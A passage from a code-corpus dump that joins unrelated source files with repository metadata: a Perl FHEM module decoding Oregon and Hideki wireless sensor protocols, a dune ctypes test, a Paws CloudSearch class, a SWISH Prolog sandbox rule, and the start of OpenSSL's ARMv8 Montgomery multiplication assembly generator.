$rvosv2byte = substr($osv2byte,$p,1).$rvosv2byte;
}
$osv2hex=$osv2hex.sprintf('%02X', oct("0b$rvosv2byte")) ;
$osv2bits = $osv2bits.$rvosv2byte;
}
$osv2hex = sprintf("%02X", length($osv2hex)*4).$osv2hex;
if (length($osv2hex)*4 == 88) {
Log3 $name, 5, "CUL_REDIRECT: OSV2 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (1,$osv2hex);
} else {
Log3 $name, 5, "CUL_REDIRECT: ERROR: To short: OSV2 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (-1, "CUL_REDIRECT: ERROR: To short: OSV2 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits");
}
}
return (-1, "Not a origon 2 protocol");
}
#
# Decode Oregon 3
#
sub decodeOrego3 {
my $msg = shift;
my $name = shift;
my @a = split("", $msg);
Log3 $name, 5, "CUL_REDIRECT decode Oregon 3 ($msg)";
my $newMSG = "";
my $bitData;
my $hlen = length($msg);
my $blen = $hlen * 4;
$bitData= unpack("B$blen", pack("H$hlen", $msg));
Log3 $name, 5, "bitdata: $bitData";
if (index($bitData,"11110101") != -1)
{ # Valid OSV2 detected!
Log3 $name, 5, "OSV3 protocol detected ($msg)";
my $message_start=index($bitData,"0101");
my $message_end=length($bitData)-8;
my $message_length = $message_end - $message_start;
my $idx=0;
my $osv2bits="";
my $osv2hex ="";
for ($idx=$message_start; $idx<$message_end; $idx=$idx+8)
{
if (length($bitData)-$idx < 16 )
{
last;
}
my $byte = "";
$byte= substr($bitData,$idx,8); ## Ignore every 9th bit
Log3 $name, 5, "$name: byte in order $byte ";
$byte = scalar reverse $byte;
Log3 $name, 5, "$name: byte reversed $byte , as hex: ".sprintf('%X', oct("0b$byte"))."\n";
#$osv2hex=$osv2hex.sprintf('%X', oct("0b$byte"));
$osv2hex=$osv2hex.sprintf('%2X', oct("0b$byte")) ;
}
$osv2hex = sprintf("%2X", length($osv2hex)*4).$osv2hex;
if (length($osv2hex)*4 > 87) {
Log3 $name, 5, "CUL_REDIRECT: OSV3 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (1,$osv2hex);
} else {
Log3 $name, 5, "CUL_REDIRECT: ERROR: To short: OSV3 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (-1, "CUL_REDIRECT: ERROR: To short: OSV3 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits");
}
}
return (-1, "Not a origon 3 protocol");
}
sub decode_Hideki
{
my $msg = shift;
my $name = shift;
my @a = split("", $msg);
Log3 $name, 5, "CUL_REDIRECT decode Hideki ($msg)";
my $bitData;
my $hlen = length($msg);
my $blen = $hlen * 4;
$bitData= unpack("B$blen", pack("H$hlen", $msg));
Log3 $name, 5, "$name: search in $bitData \n";
my $message_start = index($bitData,"10101110");
my $length_min = 72;
my $length_max = 104;
if ($message_start >= 0 ) # 0x75 but in reverse order
{
Log3 $name, 5, "$name: Hideki protocol detected \n";
# Todo: Mindest Länge für startpunkt vorspringen
# Todo: Wiederholung auch an das Modul weitergeben, damit es dort geprüft werden kann
my $message_end = index($bitData,"10101110",$message_start+18); # pruefen auf ein zweites 0x75, mindestens 18 bit nach 1. 0x75
$message_end = length($bitData) if ($message_end == -1);
my $message_length = $message_end - $message_start;
return (-1,"message is to short") if ($message_length < $length_min );
return (-1,"message is to long") if ($message_length > $length_max );
my $hidekihex;
my $idx;
for ($idx=$message_start; $idx<$message_end; $idx=$idx+9)
{
my $byte = "";
$byte= substr($bitData,$idx,8); ## Ignore every 9th bit
Log3 $name, 5, "$name: byte in order $byte ";
$byte = scalar reverse $byte;
Log3 $name, 5, "$name: byte reversed $byte , as hex: ".sprintf('%X', oct("0b$byte"))."\n";
$hidekihex=$hidekihex.sprintf('%02X', oct("0b$byte"));
}
Log3 $name, 4, "$name: hideki protocol converted to hex: $hidekihex with " .$message_length ." bits, messagestart $message_start";
return (1,$hidekihex); ## Return only the original bits, include length
}
return (-1,"Not a hideki protocol");
}
# Function which dispatches a message if needed.
sub CUL_REDIRECT_Dispatch($$$)
{
my ($hash, $rmsg,$dmsg) = @_;
my $name = $hash->{NAME};
Log3 $name, 5, "converted Data to ($dmsg)";
#if (!defined($hash->{DMSG})) {
# $hash->{DMSG} = "";
#}
#Dispatch only if $dmsg is different from last $dmsg, or if 2 seconds are between transmits
if (($hash->{RAWMSG} ne $dmsg) || ($hash->{TIME}+1 < time()) ) {
#$hash->{MSGCNT}++;
$hash->{TIME} = time();
#$hash->{DMSG} = $dmsg;
#$hash->{IODEV} = "RFXCOM";
my $OregonClientMatch=index($hash->{Clients},"OREGON");
if ($OregonClientMatch == -1) {
# Append Clients and MatchList for CUL
$hash->{Clients} = $hash->{Clients}.":OREGON:";
$hash->{MatchList}{"C:OREGON"} = "^(3[8-9A-F]|[4-6][0-9A-F]|7[0-8]).*";
}
my $HidekiClientMatch=index($hash->{Clients},"Hideki");
if ($HidekiClientMatch == -1) {
# Append Clients and MatchList for CUL
$hash->{Clients} = $hash->{Clients}.":Hideki:";
$hash->{MatchList}{"C:Hideki"} = "^P12#75[A-F0-9]{17,30}";
}
readingsSingleUpdate($hash, "state", $hash->{READINGS}{state}{VAL}, 0);
$hash->{RAWMSG} = $rmsg;
my %addvals = (RAWMSG => $rmsg, DMSG => $dmsg);
Dispatch($hash, $dmsg, \%addvals); ## Dispatch to other Modules
} else {
Log3 $name, 1, "Dropped ($dmsg) due to short time or equal msg";
}
}
###################################
sub
CUL_REDIRECT_Parse($$)
{
my ($hash, $msg) = @_;
$msg = substr($msg, 1);
my @a = split("", $msg);
my $name = $hash->{NAME};
my $rssi;
my $l = length($msg);
my $dmsg;
my $message_dispatched=FALSE;
$rssi = substr($msg, $l-2, 2);
undef($rssi) if ($rssi eq "00");
if (defined($rssi))
{
$rssi = hex($rssi);
$rssi = ($rssi>=128 ? (($rssi-256)/2-74) : ($rssi/2-74)) if defined($rssi);
Log3 $name, 5, "CUL_REDIRECT ($msg) length: $l RSSI: $rssi";
} else {
Log3 $name, 5, "CUL_REDIRECT ($msg) length: $l";
}
if ("$a[0]" eq "m") {
# Orego2
Log3 $name, 5, "CUL_REDIRECT ($msg) match Manchester COODE length: $l";
my ($rcode,$res) = decodeOrego2(substr($msg, 1), $name);
if ($rcode != -1) {
$dmsg = $res;
Log3 $name, 5, "$name Dispatch now to Oregon Module.";
CUL_REDIRECT_Dispatch($hash,$msg,$dmsg);
$message_dispatched=TRUE;
}
($rcode,$res) = decodeOrego3(substr($msg, 1), $name);
if ($rcode != -1) {
$dmsg = $res;
Log3 $name, 5, "$name Dispatch now to Oregon Module.";
CUL_REDIRECT_Dispatch($hash,$msg,$dmsg);
$message_dispatched=TRUE;
}
($rcode,$res) = decode_Hideki(substr($msg, 1), $name);
if ($rcode != -1) {
$dmsg = 'P12#' . $res;
Log3 $name, 5, "$name Dispatch now to Hideki Module.";
CUL_REDIRECT_Dispatch($hash,$msg,$dmsg);
$message_dispatched=TRUE;
}
if ($rcode == -1) {
Log3 $name, 5, "protocol does not match, ignore received package (" . substr($msg, 1) . ") Reason: $res";
return "";
}
}
if ($message_dispatched == FALSE) {
return undef;
}
return "";
}
1;
=pod
=begin html
<a name="CUL_REDIRECT"></a>
<h3>CUL_REDIRECT</h3>
<ul>
The CUL_REDIRECT modul receive additional protocols from CUL<br>
and redirect them to other modules.
<br>
<a name="CUL_REDIRECT_Parse"></a>
</ul>
=end html
=begin html_DE
<a name="CUL_REDIRECT"></a>
<h3>CUL_REDIRECT</h3>
<ul>
Das CUL_REDIRECT Modul empfängt weitere Protokolle vom CUL<br>
und leitet diese an die entsprechenden Module weiter.
<br>
<a name="CUL_REDIRECT_Parse"></a>
</ul>
=end html_DE
=cut
| 29.458213 | 151 | 0.589806 |
ed28b55a828ac69dfda2b7cc090e41218e10b75d | 494 | t | Perl | test/blackbox-tests/test-cases/ctypes/exe-vendored-override-types-generated.t/run.t | mndrix/dune | 30b84ff370351b13f05db34fd952dfe5d0249bcb | [
"MIT"
] | 245 | 2016-12-02T14:13:32.000Z | 2018-01-14T20:00:40.000Z | test/blackbox-tests/test-cases/ctypes/exe-vendored-override-types-generated.t/run.t | mndrix/dune | 30b84ff370351b13f05db34fd952dfe5d0249bcb | [
"MIT"
] | 380 | 2017-01-28T18:46:52.000Z | 2018-01-17T13:34:51.000Z | test/blackbox-tests/test-cases/ctypes/exe-vendored-override-types-generated.t/run.t | mndrix/dune | 30b84ff370351b13f05db34fd952dfe5d0249bcb | [
"MIT"
] | 59 | 2016-12-02T13:58:19.000Z | 2018-01-06T18:23:02.000Z | Generate cstubs for a "vendored" library.
We have a dummy C library hosted entirely in the 'vendor' directory and use
the ctypes instrumentation and description language to generate bindings for
it.
This is the version that builds into an executable.
This test is identical to exe-vendored.t except it overrides the
generated_types stanza field.
$ LIBEX=$(realpath "$PWD/../libexample")
$ TARGET=./vendor
$ mkdir -p $TARGET && install $LIBEX/* $TARGET
$ dune exec ./example.exe
4
| 29.058824 | 76 | 0.748988 |
ed60f768970356253e6d17aa55dc1f8aa860420a | 1,836 | pm | Perl | auto-lib/Paws/CloudSearch/DeleteIndexField.pm | agimenez/aws-sdk-perl | 9c4dff7d1af2ff0210c28ca44fb9e92bc625712b | [
"Apache-2.0"
] | 2 | 2016-09-22T09:18:33.000Z | 2017-06-20T01:36:58.000Z | auto-lib/Paws/CloudSearch/DeleteIndexField.pm | cah-rfelsburg/paws | de9ffb8d49627635a2da588066df26f852af37e4 | [
"Apache-2.0"
] | null | null | null | auto-lib/Paws/CloudSearch/DeleteIndexField.pm | cah-rfelsburg/paws | de9ffb8d49627635a2da588066df26f852af37e4 | [
"Apache-2.0"
] | null | null | null |
package Paws::CloudSearch::DeleteIndexField;
use Moose;
has DomainName => (is => 'ro', isa => 'Str', required => 1);
has IndexFieldName => (is => 'ro', isa => 'Str', required => 1);
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'DeleteIndexField');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::CloudSearch::DeleteIndexFieldResponse');
class_has _result_key => (isa => 'Str', is => 'ro', default => 'DeleteIndexFieldResult');
1;
### main pod documentation begin ###
=head1 NAME
Paws::CloudSearch::DeleteIndexField - Arguments for method DeleteIndexField on Paws::CloudSearch
=head1 DESCRIPTION
This class represents the parameters used for calling the method DeleteIndexField on the
Amazon CloudSearch service. Use the attributes of this class
as arguments to method DeleteIndexField.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to DeleteIndexField.
As an example:
$service_obj->DeleteIndexField(Att1 => $value1, Att2 => $value2, ...);
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
=head1 ATTRIBUTES
=head2 B<REQUIRED> DomainName => Str
=head2 B<REQUIRED> IndexFieldName => Str
The name of the index field your want to remove from the domain's
indexing options.
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method DeleteIndexField in L<Paws::CloudSearch>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: https://github.com/pplu/aws-sdk-perl
Please report bugs to: https://github.com/pplu/aws-sdk-perl/issues
=cut
| 29.142857 | 249 | 0.732571 |
ed7a6ca24559690fda6f6a85ca3fb515cb6addbc | 1,817 | pl | Perl | lib/flags.pl | bflagg/swish | d357234613182abcc2953d5b827d367616be8502 | [
"BSD-2-Clause"
] | 464 | 2015-01-01T13:56:55.000Z | 2022-03-08T01:44:04.000Z | lib/flags.pl | bflagg/swish | d357234613182abcc2953d5b827d367616be8502 | [
"BSD-2-Clause"
] | 129 | 2015-01-20T00:19:46.000Z | 2022-02-14T19:49:17.000Z | lib/flags.pl | bflagg/swish | d357234613182abcc2953d5b827d367616be8502 | [
"BSD-2-Clause"
] | 132 | 2015-01-02T10:02:47.000Z | 2022-03-29T10:34:51.000Z | /* Part of SWISH
Author: Jan Wielemaker
E-mail: J.Wielemaker@vu.nl
WWW: http://www.swi-prolog.org
Copyright (c) 2015, VU University Amsterdam
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
:- module(swish_flags, []).
:- multifile
sandbox:safe_primitive/1.
sandbox:safe_primitive(set_prolog_flag(Flag, _Value)) :-
safe_prolog_flag(Flag).
sandbox:safe_primitive(current_prolog_flag(Flag, _Value)) :-
safe_prolog_flag(Flag).
safe_prolog_flag(occurs_check).
| 39.5 | 72 | 0.741332 |
ed77a8a152a226b98b153a7ec93a7db29b61daf5 | 37,204 | pl | Perl | crypto/bn/asm/armv8-mont.pl | JamesWP/openssl | 922241de76dce66a04e0217bfc270a5228b694f3 | [
"Apache-2.0"
] | 4 | 2017-07-18T18:24:43.000Z | 2018-01-28T19:26:37.000Z | crypto/bn/asm/armv8-mont.pl | JamesWP/openssl | 922241de76dce66a04e0217bfc270a5228b694f3 | [
"Apache-2.0"
] | 1 | 2016-02-27T16:30:29.000Z | 2016-02-27T19:50:04.000Z | crypto/bn/asm/armv8-mont.pl | JamesWP/openssl | 922241de76dce66a04e0217bfc270a5228b694f3 | [
"Apache-2.0"
] | 3 | 2016-02-27T14:35:30.000Z | 2017-03-13T03:38:09.000Z | #! /usr/bin/env perl
# Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the Apache License 2.0 (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
# March 2015
#
# "Teaser" Montgomery multiplication module for ARMv8. Needs more
# work. While it does improve RSA sign performance by 20-30% (less for
# longer keys) on most processors, for some reason RSA2048 is not
# faster and RSA4096 goes 15-20% slower on Cortex-A57. Multiplication
# instruction issue rate is limited on processor in question, meaning
# that dedicated squaring procedure is a must. Well, actually all
# contemporary AArch64 processors seem to have limited multiplication
# issue rate, i.e. they can't issue multiplication every cycle, which
# explains moderate improvement coefficients in comparison to
# compiler-generated code. Recall that compiler is instructed to use
# umulh and therefore uses same amount of multiplication instructions
# to do the job. Assembly's edge is to minimize number of "collateral"
# instructions and of course instruction scheduling.
#
# April 2015
#
# Squaring procedure that handles lengths divisible by 8 improves
# RSA/DSA performance by 25-40-60% depending on processor and key
# length. Overall improvement coefficients are always positive in
# comparison to compiler-generated code. On Cortex-A57 improvement
# is still modest on longest key lengths, while others exhibit e.g.
# 50-70% improvement for RSA4096 sign. RSA2048 sign is ~25% faster
# on Cortex-A57 and ~60-100% faster on others.
# $output is the last argument if it looks like a file (it has an extension)
# $flavour is the first argument if it doesn't look like a file
my $output = $#ARGV >= 0 && $ARGV[$#ARGV] =~ m|\.\w+$| ? pop : undef;
my $flavour = $#ARGV >= 0 && $ARGV[0] !~ m|\.| ? shift : undef;
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}arm-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../../perlasm/arm-xlate.pl" and -f $xlate) or
die "can't locate arm-xlate.pl";
open OUT,"| \"$^X\" $xlate $flavour \"$output\""
or die "can't call $xlate: $1";
*STDOUT=*OUT;
($lo0,$hi0,$aj,$m0,$alo,$ahi,
$lo1,$hi1,$nj,$m1,$nlo,$nhi,
$ovf, $i,$j,$tp,$tj) = map("x$_",6..17,19..24);
# int bn_mul_mont(
$rp="x0"; # BN_ULONG *rp,
$ap="x1"; # const BN_ULONG *ap,
$bp="x2"; # const BN_ULONG *bp,
$np="x3"; # const BN_ULONG *np,
$n0="x4"; # const BN_ULONG *n0,
$num="x5"; # int num);
$code.=<<___;
.text
.globl bn_mul_mont
.type bn_mul_mont,%function
.align 5
bn_mul_mont:
tst $num,#7
b.eq __bn_sqr8x_mont
tst $num,#3
b.eq __bn_mul4x_mont
.Lmul_mont:
stp x29,x30,[sp,#-64]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
ldr $m0,[$bp],#8 // bp[0]
sub $tp,sp,$num,lsl#3
ldp $hi0,$aj,[$ap],#16 // ap[0..1]
lsl $num,$num,#3
ldr $n0,[$n0] // *n0
and $tp,$tp,#-16 // ABI says so
ldp $hi1,$nj,[$np],#16 // np[0..1]
mul $lo0,$hi0,$m0 // ap[0]*bp[0]
sub $j,$num,#16 // j=num-2
umulh $hi0,$hi0,$m0
mul $alo,$aj,$m0 // ap[1]*bp[0]
umulh $ahi,$aj,$m0
mul $m1,$lo0,$n0 // "tp[0]"*n0
mov sp,$tp // alloca
// (*) mul $lo1,$hi1,$m1 // np[0]*m1
umulh $hi1,$hi1,$m1
mul $nlo,$nj,$m1 // np[1]*m1
// (*) adds $lo1,$lo1,$lo0 // discarded
// (*) As for removal of first multiplication and addition
// instructions. The outcome of first addition is
// guaranteed to be zero, which leaves two computationally
// significant outcomes: it either carries or not. Then
// question is when does it carry? Is there alternative
// way to deduce it? If you follow operations, you can
// observe that condition for carry is quite simple:
// $lo0 being non-zero. So that carry can be calculated
// by adding -1 to $lo0. That's what next instruction does.
subs xzr,$lo0,#1 // (*)
umulh $nhi,$nj,$m1
adc $hi1,$hi1,xzr
cbz $j,.L1st_skip
.L1st:
ldr $aj,[$ap],#8
adds $lo0,$alo,$hi0
sub $j,$j,#8 // j--
adc $hi0,$ahi,xzr
ldr $nj,[$np],#8
adds $lo1,$nlo,$hi1
mul $alo,$aj,$m0 // ap[j]*bp[0]
adc $hi1,$nhi,xzr
umulh $ahi,$aj,$m0
adds $lo1,$lo1,$lo0
mul $nlo,$nj,$m1 // np[j]*m1
adc $hi1,$hi1,xzr
umulh $nhi,$nj,$m1
str $lo1,[$tp],#8 // tp[j-1]
cbnz $j,.L1st
.L1st_skip:
adds $lo0,$alo,$hi0
sub $ap,$ap,$num // rewind $ap
adc $hi0,$ahi,xzr
adds $lo1,$nlo,$hi1
sub $np,$np,$num // rewind $np
adc $hi1,$nhi,xzr
adds $lo1,$lo1,$lo0
sub $i,$num,#8 // i=num-1
adcs $hi1,$hi1,$hi0
adc $ovf,xzr,xzr // upmost overflow bit
stp $lo1,$hi1,[$tp]
.Louter:
ldr $m0,[$bp],#8 // bp[i]
ldp $hi0,$aj,[$ap],#16
ldr $tj,[sp] // tp[0]
add $tp,sp,#8
mul $lo0,$hi0,$m0 // ap[0]*bp[i]
sub $j,$num,#16 // j=num-2
umulh $hi0,$hi0,$m0
ldp $hi1,$nj,[$np],#16
mul $alo,$aj,$m0 // ap[1]*bp[i]
adds $lo0,$lo0,$tj
umulh $ahi,$aj,$m0
adc $hi0,$hi0,xzr
mul $m1,$lo0,$n0
sub $i,$i,#8 // i--
// (*) mul $lo1,$hi1,$m1 // np[0]*m1
umulh $hi1,$hi1,$m1
mul $nlo,$nj,$m1 // np[1]*m1
// (*) adds $lo1,$lo1,$lo0
subs xzr,$lo0,#1 // (*)
umulh $nhi,$nj,$m1
cbz $j,.Linner_skip
.Linner:
ldr $aj,[$ap],#8
adc $hi1,$hi1,xzr
ldr $tj,[$tp],#8 // tp[j]
adds $lo0,$alo,$hi0
sub $j,$j,#8 // j--
adc $hi0,$ahi,xzr
adds $lo1,$nlo,$hi1
ldr $nj,[$np],#8
adc $hi1,$nhi,xzr
mul $alo,$aj,$m0 // ap[j]*bp[i]
adds $lo0,$lo0,$tj
umulh $ahi,$aj,$m0
adc $hi0,$hi0,xzr
mul $nlo,$nj,$m1 // np[j]*m1
adds $lo1,$lo1,$lo0
umulh $nhi,$nj,$m1
stur $lo1,[$tp,#-16] // tp[j-1]
cbnz $j,.Linner
.Linner_skip:
ldr $tj,[$tp],#8 // tp[j]
adc $hi1,$hi1,xzr
adds $lo0,$alo,$hi0
sub $ap,$ap,$num // rewind $ap
adc $hi0,$ahi,xzr
adds $lo1,$nlo,$hi1
sub $np,$np,$num // rewind $np
adcs $hi1,$nhi,$ovf
adc $ovf,xzr,xzr
adds $lo0,$lo0,$tj
adc $hi0,$hi0,xzr
adds $lo1,$lo1,$lo0
adcs $hi1,$hi1,$hi0
adc $ovf,$ovf,xzr // upmost overflow bit
stp $lo1,$hi1,[$tp,#-16]
cbnz $i,.Louter
// Final step. We see if result is larger than modulus, and
// if it is, subtract the modulus. But comparison implies
// subtraction. So we subtract modulus, see if it borrowed,
// and conditionally copy original value.
ldr $tj,[sp] // tp[0]
add $tp,sp,#8
ldr $nj,[$np],#8 // np[0]
subs $j,$num,#8 // j=num-1 and clear borrow
mov $ap,$rp
.Lsub:
sbcs $aj,$tj,$nj // tp[j]-np[j]
ldr $tj,[$tp],#8
sub $j,$j,#8 // j--
ldr $nj,[$np],#8
str $aj,[$ap],#8 // rp[j]=tp[j]-np[j]
cbnz $j,.Lsub
sbcs $aj,$tj,$nj
sbcs $ovf,$ovf,xzr // did it borrow?
str $aj,[$ap],#8 // rp[num-1]
ldr $tj,[sp] // tp[0]
add $tp,sp,#8
ldr $aj,[$rp],#8 // rp[0]
sub $num,$num,#8 // num--
nop
.Lcond_copy:
sub $num,$num,#8 // num--
csel $nj,$tj,$aj,lo // did it borrow?
ldr $tj,[$tp],#8
ldr $aj,[$rp],#8
stur xzr,[$tp,#-16] // wipe tp
stur $nj,[$rp,#-16]
cbnz $num,.Lcond_copy
csel $nj,$tj,$aj,lo
stur xzr,[$tp,#-8] // wipe tp
stur $nj,[$rp,#-8]
ldp x19,x20,[x29,#16]
mov sp,x29
ldp x21,x22,[x29,#32]
mov x0,#1
ldp x23,x24,[x29,#48]
ldr x29,[sp],#64
ret
.size bn_mul_mont,.-bn_mul_mont
___
{
########################################################################
# Following is ARMv8 adaptation of sqrx8x_mont from x86_64-mont5 module.
my ($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("x$_",(6..13));
my ($t0,$t1,$t2,$t3)=map("x$_",(14..17));
my ($acc0,$acc1,$acc2,$acc3,$acc4,$acc5,$acc6,$acc7)=map("x$_",(19..26));
my ($cnt,$carry,$topmost)=("x27","x28","x30");
my ($tp,$ap_end,$na0)=($bp,$np,$carry);
$code.=<<___;
.type __bn_sqr8x_mont,%function
.align 5
__bn_sqr8x_mont:
cmp $ap,$bp
b.ne __bn_mul4x_mont
.Lsqr8x_mont:
.inst 0xd503233f // paciasp
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
stp $rp,$np,[sp,#96] // offload rp and np
ldp $a0,$a1,[$ap,#8*0]
ldp $a2,$a3,[$ap,#8*2]
ldp $a4,$a5,[$ap,#8*4]
ldp $a6,$a7,[$ap,#8*6]
sub $tp,sp,$num,lsl#4
lsl $num,$num,#3
ldr $n0,[$n0] // *n0
mov sp,$tp // alloca
sub $cnt,$num,#8*8
b .Lsqr8x_zero_start
.Lsqr8x_zero:
sub $cnt,$cnt,#8*8
stp xzr,xzr,[$tp,#8*0]
stp xzr,xzr,[$tp,#8*2]
stp xzr,xzr,[$tp,#8*4]
stp xzr,xzr,[$tp,#8*6]
.Lsqr8x_zero_start:
stp xzr,xzr,[$tp,#8*8]
stp xzr,xzr,[$tp,#8*10]
stp xzr,xzr,[$tp,#8*12]
stp xzr,xzr,[$tp,#8*14]
add $tp,$tp,#8*16
cbnz $cnt,.Lsqr8x_zero
add $ap_end,$ap,$num
add $ap,$ap,#8*8
mov $acc0,xzr
mov $acc1,xzr
mov $acc2,xzr
mov $acc3,xzr
mov $acc4,xzr
mov $acc5,xzr
mov $acc6,xzr
mov $acc7,xzr
mov $tp,sp
str $n0,[x29,#112] // offload n0
// Multiply everything but a[i]*a[i]
.align 4
.Lsqr8x_outer_loop:
// a[1]a[0] (i)
// a[2]a[0]
// a[3]a[0]
// a[4]a[0]
// a[5]a[0]
// a[6]a[0]
// a[7]a[0]
// a[2]a[1] (ii)
// a[3]a[1]
// a[4]a[1]
// a[5]a[1]
// a[6]a[1]
// a[7]a[1]
// a[3]a[2] (iii)
// a[4]a[2]
// a[5]a[2]
// a[6]a[2]
// a[7]a[2]
// a[4]a[3] (iv)
// a[5]a[3]
// a[6]a[3]
// a[7]a[3]
// a[5]a[4] (v)
// a[6]a[4]
// a[7]a[4]
// a[6]a[5] (vi)
// a[7]a[5]
// a[7]a[6] (vii)
mul $t0,$a1,$a0 // lo(a[1..7]*a[0]) (i)
mul $t1,$a2,$a0
mul $t2,$a3,$a0
mul $t3,$a4,$a0
adds $acc1,$acc1,$t0 // t[1]+lo(a[1]*a[0])
mul $t0,$a5,$a0
adcs $acc2,$acc2,$t1
mul $t1,$a6,$a0
adcs $acc3,$acc3,$t2
mul $t2,$a7,$a0
adcs $acc4,$acc4,$t3
umulh $t3,$a1,$a0 // hi(a[1..7]*a[0])
adcs $acc5,$acc5,$t0
umulh $t0,$a2,$a0
adcs $acc6,$acc6,$t1
umulh $t1,$a3,$a0
adcs $acc7,$acc7,$t2
umulh $t2,$a4,$a0
stp $acc0,$acc1,[$tp],#8*2 // t[0..1]
adc $acc0,xzr,xzr // t[8]
adds $acc2,$acc2,$t3 // t[2]+lo(a[1]*a[0])
umulh $t3,$a5,$a0
adcs $acc3,$acc3,$t0
umulh $t0,$a6,$a0
adcs $acc4,$acc4,$t1
umulh $t1,$a7,$a0
adcs $acc5,$acc5,$t2
mul $t2,$a2,$a1 // lo(a[2..7]*a[1]) (ii)
adcs $acc6,$acc6,$t3
mul $t3,$a3,$a1
adcs $acc7,$acc7,$t0
mul $t0,$a4,$a1
adc $acc0,$acc0,$t1
mul $t1,$a5,$a1
adds $acc3,$acc3,$t2
mul $t2,$a6,$a1
adcs $acc4,$acc4,$t3
mul $t3,$a7,$a1
adcs $acc5,$acc5,$t0
umulh $t0,$a2,$a1 // hi(a[2..7]*a[1])
adcs $acc6,$acc6,$t1
umulh $t1,$a3,$a1
adcs $acc7,$acc7,$t2
umulh $t2,$a4,$a1
adcs $acc0,$acc0,$t3
umulh $t3,$a5,$a1
stp $acc2,$acc3,[$tp],#8*2 // t[2..3]
adc $acc1,xzr,xzr // t[9]
adds $acc4,$acc4,$t0
umulh $t0,$a6,$a1
adcs $acc5,$acc5,$t1
umulh $t1,$a7,$a1
adcs $acc6,$acc6,$t2
mul $t2,$a3,$a2 // lo(a[3..7]*a[2]) (iii)
adcs $acc7,$acc7,$t3
mul $t3,$a4,$a2
adcs $acc0,$acc0,$t0
mul $t0,$a5,$a2
adc $acc1,$acc1,$t1
mul $t1,$a6,$a2
adds $acc5,$acc5,$t2
mul $t2,$a7,$a2
adcs $acc6,$acc6,$t3
umulh $t3,$a3,$a2 // hi(a[3..7]*a[2])
adcs $acc7,$acc7,$t0
umulh $t0,$a4,$a2
adcs $acc0,$acc0,$t1
umulh $t1,$a5,$a2
adcs $acc1,$acc1,$t2
umulh $t2,$a6,$a2
stp $acc4,$acc5,[$tp],#8*2 // t[4..5]
adc $acc2,xzr,xzr // t[10]
adds $acc6,$acc6,$t3
umulh $t3,$a7,$a2
adcs $acc7,$acc7,$t0
mul $t0,$a4,$a3 // lo(a[4..7]*a[3]) (iv)
adcs $acc0,$acc0,$t1
mul $t1,$a5,$a3
adcs $acc1,$acc1,$t2
mul $t2,$a6,$a3
adc $acc2,$acc2,$t3
mul $t3,$a7,$a3
adds $acc7,$acc7,$t0
umulh $t0,$a4,$a3 // hi(a[4..7]*a[3])
adcs $acc0,$acc0,$t1
umulh $t1,$a5,$a3
adcs $acc1,$acc1,$t2
umulh $t2,$a6,$a3
adcs $acc2,$acc2,$t3
umulh $t3,$a7,$a3
stp $acc6,$acc7,[$tp],#8*2 // t[6..7]
adc $acc3,xzr,xzr // t[11]
adds $acc0,$acc0,$t0
mul $t0,$a5,$a4 // lo(a[5..7]*a[4]) (v)
adcs $acc1,$acc1,$t1
mul $t1,$a6,$a4
adcs $acc2,$acc2,$t2
mul $t2,$a7,$a4
adc $acc3,$acc3,$t3
umulh $t3,$a5,$a4 // hi(a[5..7]*a[4])
adds $acc1,$acc1,$t0
umulh $t0,$a6,$a4
adcs $acc2,$acc2,$t1
umulh $t1,$a7,$a4
adcs $acc3,$acc3,$t2
